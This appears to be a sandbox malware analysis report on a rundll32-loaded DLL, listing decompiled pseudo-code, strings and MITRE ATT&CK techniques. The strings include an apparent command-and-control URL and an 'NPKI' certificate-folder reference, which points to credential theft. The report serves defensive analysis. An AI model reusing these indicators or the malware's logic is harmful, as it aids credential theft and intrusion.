						_push(_t133 - 0x5d8);
						E1002E0E4(_t103, _t122, _t123, _t132, _t148);
						_pop(es);
					}
					 *0x10017b90 = 1;
					Sleep(0xbb8);
				}
				_t64 = _t133 - 0x4d8;
				0x10036154(_t122,  *((intOrPtr*)(_t133 - 4)), _t64);
				 *((intOrPtr*)(_t133 + 0x15840fc0)) =  *((intOrPtr*)(_t133 + 0x15840fc0)) + _t64;
				 *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) =  *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) + _t64 +  *_t64;
			}

APIs

Sleep.KERNEL32(00000BB8), ref: 100081D8

Strings

%s\%s, xrefs: 10008078
NPKI, xrefs: 1000803D
L2ltYWdlLnBocA==, xrefs: 1000819C
107.163.56.232:18963/main.php, xrefs: 10008124

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: %s\%s$107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$NPKI
API String ID: 3472027048-2092272908
Opcode ID: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
Instruction ID: 0f1f9c0d47637e2dd1cb31eff19b899711e0bc4e543d466f80a7974f01d04c09
Opcode Fuzzy Hash: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
Instruction Fuzzy Hash: 9F51627680425DAEEB51D7B4DC45BEE7BBCFB08251F1404E6E648E6181EB709B888F11

Uniqueness

Uniqueness Score: -1.00%

Function 1000C3AB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 466
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1000C3AB(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a19) {
				signed int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed char _v25;
				char _v26;
				char _v27;
				char _v28;
				signed int _v32;
				char _v33;
				char _v44;
				char _v56;
				signed int _v62;
				signed int _v66;
				signed char _v74;
				char _v334;
				char _v594;
				signed int _v598;
				char* _v602;
				char* _v606;
				char _v866;
				intOrPtr _v870;
				signed int _v874;
				short _v876;
				short _v878;
				signed short _v880;
				signed int _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				char _v896;
				signed int _v900;
				signed int _v904;
				signed int _v908;
				unsigned int _v912;
				signed int _v914;
				signed int _v916;
				short _v918;
				char _v920;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t185;
				signed int _t186;
				char _t193;
				signed int _t198;
				char _t207;
				char _t209;
				char _t214;
				char _t216;
				char _t218;
				char _t221;
				char _t223;
				signed int _t231;
				signed int _t233;
				char _t240;
				intOrPtr _t245;
				signed int _t249;
				intOrPtr _t251;
				void* _t252;
				signed int _t256;
				signed int _t261;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t274;
				signed int _t285;
				signed int* _t286;
				void* _t287;
				signed int _t288;
				signed int _t289;
				void* _t292;
				void* _t296;
				void* _t297;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				signed int _t309;
				signed int _t311;
				void* _t323;
				intOrPtr _t334;
				signed int _t339;
				void* _t340;
				char* _t341;
				signed int _t342;
				intOrPtr _t343;
				signed int* _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t354;

				_t354 = __fp0;
				_t323 = __edx;
				_t290 = __ecx;
				_t346 = __ecx;
				if(__ecx[4] != 0) {
					return 0x40000;
				}
				__eflags = __ecx[9];
				if(__ecx[9] == 0) {
					__eflags =  *__ecx;
					_t334 = _a16;
					_v32 = 0;
					if( *__ecx != 0) {
						__eflags = _t334 - 4;
						if(_t334 != 4) {
							_v32 = 0xc;
						}
					}
					_push(_a4);
					E1000CD0E(_t290,  &_v1180);
					__eflags = _v1180;
					_pop(_t292);
					if(_v1180 == 0) {
						L89:
						return 0x10000;
					}
					_t185 =  &_v1180;
					do {
						__eflags =  *_t185 - 0x5c;
						if( *_t185 == 0x5c) {
							 *_t185 = 0x2f;
						}
						_t185 = _t185 + 1;
						__eflags =  *_t185;
					} while ( *_t185 != 0);
					__eflags = _t334 - 4;
					_a19 = _t334 == 4;
					__eflags = _a19;
					if(_a19 == 0) {
						L15:
						_t16 =  &_a7;
						 *_t16 = _a7 & 0x00000000;
						__eflags =  *_t16;
						L16:
						__eflags = _a19;
						_v8 = 8;
						if(__eflags != 0) {
							L18:
							_v8 = 0;
							L19:
							__eflags = _t334 - 2;
							if(_t334 != 2) {
								__eflags = _t334 - 1;
								if(_t334 != 1) {
									__eflags = _t334 - 3;
									if(_t334 != 3) {
										__eflags = _t334 - 4;
										if(__eflags != 0) {
											goto L89;
										}
										_t293 = _t346;
										_t186 = E1000C0F9(0, _t346, _t323, _t334, __eflags);
										L27:
										__eflags = _t186;
										if(_t186 != 0) {
											L90:
											return _t186;
										}
										_push(0x10017b9c);
										_v62 = 0;
										E1000CD0E(_t293,  &_v866);
										_push( &_v1180);
										E1000CD0E(_t293,  &_v594);
										_push( &_v594);
										_t193 = E1000CD02(_t293, _t346);
										_t349 = _t348 + 0x14;
										__eflags = _a7;
										_v896 = _t193;
										if(_a7 != 0) {
											_push("/");
											E1000CD08(_t293,  &_v594);
											_t35 =  &_v896;
											 *_t35 = _v896 + 1;
											__eflags =  *_t35;
											_pop(_t293);
										}
										_push(0x10017b9c);
										E1000CD0E(_t293,  &_v334);
										__eflags =  *_t346;
										_v598 = 0;
										_v884 = 0;
										_v74 = 1;
										_v66 = 0;
										_v878 = 0;
										_v920 = 0xb17;
										_v918 = 0x14;
										_v912 = _t346[0x18];
										_v908 = 0;
										_v916 = 8;
										if( *_t346 != 0) {
											__eflags = _a19;
											if(_a19 == 0) {
												_v916 = 9;
											}
										}
										_v876 = _v916;
										_t198 = _v8;
										__eflags = _t198;
										_v914 = _t198;
										if(_t198 != 0) {
											L36:
											_v904 = 0;
											goto L37;
										} else {
											_t274 = _t346[0x19];
											__eflags = _t274;
											if(_t274 < 0) {
												goto L36;
											}
											_v904 = _t274 + _v32;
											L37:
											_v900 = _t346[0x19];
											_v874 = _t346[0x11];
											_v880 = _v880 & 0x00000000;
											_v25 = _v25 & 0x00000000;
											_v870 = _t346[5] + _t346[3];
											_v606 =  &_v28;
											_v602 =  &_v56;
											_v23 = _t346[0x14];
											_t296 = 8;
											_v892 = 0x11;
											_v888 = 9;
											_v28 = 0x55;
											_v27 = 0x54;
											_v26 = 0xd;
											_v24 = 7;
											_t207 = E1000CEF0(_t346[0x14], _t296, _t346[0x15]);
											_v22 = _t207;
											_t297 = 0x10;
											_t209 = E1000CEF0(_t346[0x14], _t297, _t346[0x15]);
											_v21 = _t209;
											_t298 = 0x18;
											_v20 = E1000CEF0(_t346[0x14], _t298, _t346[0x15]);
											_v19 = _t346[0x12];
											_t299 = 8;
											_t214 = E1000CEF0(_t346[0x12], _t299, _t346[0x13]);
											_v18 = _t214;
											_t300 = 0x10;
											_t216 = E1000CEF0(_t346[0x12], _t300, _t346[0x13]);
											_v17 = _t216;
											_t301 = 0x18;
											_t218 = E1000CEF0(_t346[0x12], _t301, _t346[0x13]);
											_t285 = _t346[0x17];
											_v16 = _t218;
											_v15 = _t346[0x16];
											_t302 = 8;
											_t221 = E1000CEF0(_t346[0x16], _t302, _t285);
											_v14 = _t221;
											_t303 = 0x10;
											_t223 = E1000CEF0(_t346[0x16], _t303, _t285);
											_v13 = _t223;
											_t304 = 0x18;
											_t332 = _t285;
											_v12 = E1000CEF0(_t346[0x16], _t304, _t285);
											_t101 =  &_v28; // 0x55
											_push(9);
											_push( &_v56);
											E1000CD50( &_v56, _t346);
											_push(_t346);
											_push(E1000BCE1);
											 *((char*)(_v602 + 2)) = 5;
											_push( &_v920);
											_t231 = E1000AED1(_t304);
											_t350 = _t349 + 0x18;
											__eflags = _t231;
											if(_t231 == 0) {
												_t109 = _v896 + 0x1e; // 0x2f
												_t233 = _v892 + _t109;
												_t346[5] = _t346[5] + _t233;
												__eflags = _t346[4];
												if(_t346[4] == 0) {
													_t339 =  *_t346;
													_t286 =  &(_t346[0xa]);
													__eflags = _t339;
													 *_t286 = 0x12345678;
													_t346[0xb] = 0x23456789;
													_t346[0xc] = 0x34567890;
													if(_t339 == 0) {
														L44:
														__eflags =  *0x10017fa4;
														if( *0x10017fa4 == 0) {
															0x10037ff5(_t233);
															0x10031c8a();
															 *_t286 =  *_t286 ^ 0xe85057f8;
															asm("insd");
															asm("pushad");
															__eflags = _t233 +  *_t233;
														}
														_t340 = 0;
														__eflags = 0;
														do {
															 *((char*)(_t347 + _t340 - 0x28)) = rand() >> 7;
															_t340 = _t340 + 1;
															__eflags = _t340 - 0xc;
														} while (_t340 < 0xc);
														_v33 = _v912 >> 8;
														_t287 = 0;
														__eflags = 0;
														do {
															_t341 = _t347 + _t287 - 0x28;
															_t240 = E1000B8A2(__eflags,  &(_t346[0xa]),  *((intOrPtr*)(_t347 + _t287 - 0x28)));
															_t287 = _t287 + 1;
															__eflags = _t287 - 0xc;
															 *_t341 = _t240;
														} while (__eflags < 0);
														_t288 = 0;
														__eflags =  *_t346;
														if( *_t346 == 0) {
															L56:
															__eflags = 0;
															L57:
															__eflags = _a19;
															_t346[9] = 0;
															if(_a19 != 0) {
																_t342 = _v8;
																_t346[0x20] = _t288;
																L64:
																_t346[9] = _t346[9] & 0x00000000;
																E1000C233(_t346);
																_t309 = _t346[0x20];
																_t186 = _t346[4];
																_t346[5] = _t346[5] + _t309;
																__eflags = _t186;
																if(_t186 != 0) {
																	goto L90;
																}
																__eflags = _t288;
																if(_t288 != 0) {
																	L80:
																	return 0x400;
																}
																_t333 = _t346[0x1b];
																_t245 = _v32 + _t309;
																_v908 = _t346[0x1b];
																__eflags = _v904 - _t245;
																_v904 = _t245;
																_t310 = _t309 & 0xffffff00 | _v904 == _t245;
																__eflags = _t346[6] - _t288;
																_v900 = _t346[0x19];
																if(_t346[6] == _t288) {
																	L75:
																	__eflags = _v914 - _t342;
																	if(_v914 != _t342) {
																		L78:
																		return 0x4000000;
																	}
																	__eflags = _t342;
																	if(_t342 != 0) {
																		L79:
																		_push(_t346);
																		_push(E1000BCE1);
																		_push( &_v920);
																		_t249 = E1000B113(_t310);
																		__eflags = _t249;
																		if(_t249 == 0) {
																			_t169 =  &(_t346[5]);
																			 *_t169 = _t346[5] + 0x10;
																			__eflags =  *_t169;
																			_v916 = _v876;
																			L82:
																			_t186 = _t346[4];
																			__eflags = _t186;
																			if(__eflags != 0) {
																				goto L90;
																			}
																			_t251 = E1000CCAE(_t186, _t288, _t310, _t333, _t342, _t346, _t347, __eflags, _t354, _v888);
																			_push(_v888);
																			_t343 = _t251;
																			_push(_v602);
																			_push(_t343);
																			_t252 = E1000CD50(_t251, _t346);
																			_v602 = _t343;
																			_t289 = E1000CCAE(_t252, _t288, _t310, _t333, 0x35e, _t346, _t347, __eflags, _t354, 0x35e);
																			_push(0x35e);
																			_push( &_v920);
																			_push(_t289);
																			E1000CD50( &_v920, _t346);
																			_t256 = _t346[0xf];
																			__eflags = _t256;
																			if(_t256 != 0) {
																				while(1) {
																					_t311 =  *(_t256 + 0x35a);
																					__eflags = _t311;
																					if(_t311 == 0) {
																						break;
																					}
																					_t256 = _t311;
																				}
																				 *(_t256 + 0x35a) = _t289;
																				L88:
																				return 0;
																			}
																			_t346[0xf] = _t289;
																			goto L88;
																		}
																		goto L80;
																	}
																	__eflags = _t310;
																	if(_t310 != 0) {
																		goto L79;
																	}
																	goto L78;
																}
																__eflags =  *_t346 - _t288;
																if( *_t346 == _t288) {
																	L69:
																	__eflags = _v916 & 0x00000001;
																	_v914 = _t342;
																	if((_v916 & 0x00000001) == 0) {
																		_t158 =  &_v916;
																		 *_t158 = _v916 & 0x0000fff7;
																		__eflags =  *_t158;
																	}
																	_t312 = _t346;
																	_v876 = _v916;
																	_t261 = E1000BDCB(_t346, _v870 - _t346[3]);
																	__eflags = _t261;
																	if(_t261 == 0) {
																		L74:
																		return 0x2000000;
																	} else {
																		_push(_t346);
																		_push(E1000BCE1);
																		_push( &_v920);
																		_t264 = E1000AED1(_t312);
																		__eflags = _t264;
																		if(_t264 != 0) {
																			goto L80;
																		}
																		_t310 = _t346;
																		_t265 = E1000BDCB(_t346, _t346[5]);
																		__eflags = _t265;
																		if(_t265 != 0) {
																			goto L82;
																		}
																		goto L74;
																	}
																}
																__eflags = _a19 - _t288;
																if(_a19 == _t288) {
																	goto L75;
																}
																goto L69;
															}
															_t342 = _v8;
															__eflags = _t342 - 8;
															if(_t342 != 8) {
																__eflags = _t342;
																if(_t342 != 0) {
																	goto L64;
																}
																_t266 = E1000C354(_t354);
																L60:
																_t288 = _t266;
																goto L64;
															}
															_t266 = E1000C272(_t346, _t332, _t347, _t354,  &_v920);
															goto L60;
														}
														__eflags = _a19;
														if(_a19 == 0) {
															E1000BCE1(_t346,  &_v44, 0xc);
															_t350 = _t350 + 0xc;
															_t128 =  &(_t346[5]);
															 *_t128 = _t346[5] + 0xc;
															__eflags =  *_t128;
														}
														__eflags =  *_t346 - _t288;
														if( *_t346 == _t288) {
															goto L56;
														} else {
															__eflags = _a19;
															if(_a19 != 0) {
																goto L56;
															}
															_push(1);
															_pop(0);
															goto L57;
														}
													} else {
														goto L42;
													}
													while(1) {
														L42:
														_t233 =  *_t339;
														__eflags = _t233;
														if(_t233 == 0) {
															goto L44;
														}
														_t233 = E1000B834(_t286, _t233);
														_t339 = _t339 + 1;
														__eflags = _t339;
														if(_t339 != 0) {
															continue;
														}
														goto L44;
													}
													goto L44;
												}
												E1000C233(_t346);
												return _t346[4];
											}
											E1000C233(_t346);
											goto L80;
										}
									}
									_push(_a12);
									_t293 = _t346;
									_push(_a8);
									_t186 = E1000C049(0, _t346, _t334);
									goto L27;
								}
								_push(_a12);
								_t293 = _t346;
								_push(_a8);
								_t186 = L1000BF37(_t185, _t346, _t323);
								goto L27;
							}
							_t293 = _t346;
							_t186 = E1000BEBF(_t346, _t323, _a8);
							goto L27;
						}
						_t185 = E1000B8C7(_t292, __eflags,  &_v1180);
						__eflags = _t185;
						if(_t185 == 0) {
							goto L19;
						}
						goto L18;
					}
					_push( &_v1180);
					_t185 = E1000CD02(_t292, _t346);
					__eflags =  *((char*)(_t347 + _t185 - 0x499)) - 0x2f;
					_pop(_t292);
					if( *((char*)(_t347 + _t185 - 0x499)) == 0x2f) {
						goto L15;
					}
					_a7 = 1;
					goto L16;
				} else {
					return 0x50000;
				}
			}

Strings

/, xrefs: 1000C43B
UT, xrefs: 1000C6C8, 1000C6CD

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
Instruction ID: 2ff0a1464254cde498339df49cc164f73800a0e7302aa6a381dd2afc7f8218aa
Opcode Fuzzy Hash: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
Instruction Fuzzy Hash: 2C02D375A0438D9BEB21CF68C845F9EBBF5EF04380F1444AEE449A7246CB70AE85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10005CF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t20;
				signed int _t26;
				signed int _t30;

				_t30 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t30 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t36 = _t20;
					if(_t20 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t36, _a4, _a8,  &_v8, 0);
					E10003F92(_t36);
					if(E10003F7D(_a4, "http://") == 0) {
						goto L1;
					}
					_t26 = E10003F7D(_a4, "search");
					asm("sbb eax, eax");
					return  ~_t26 + 1;
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61

Strings

search, xrefs: 10005D9B
%s\lang.ini, xrefs: 10005D26
http://, xrefs: 10005D87

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$http://$search
API String ID: 1721638100-482061809
Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60

Uniqueness

Uniqueness Score: -1.00%

Function 10005C4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t19;
				signed int _t24;
				signed int _t28;

				_t28 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t28 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t32 = _t19;
					if(_t19 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t32, _a4, _a8,  &_v8, 0);
					E10003F92(_t32);
					_t24 = E10003F7D(_a4, "http://");
					asm("sbb eax, eax");
					return  ~( ~_t24);
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6

Strings

%s\lang.ini, xrefs: 10005C7B
http://, xrefs: 10005CDC

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$http://
API String ID: 1721638100-679094439
Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
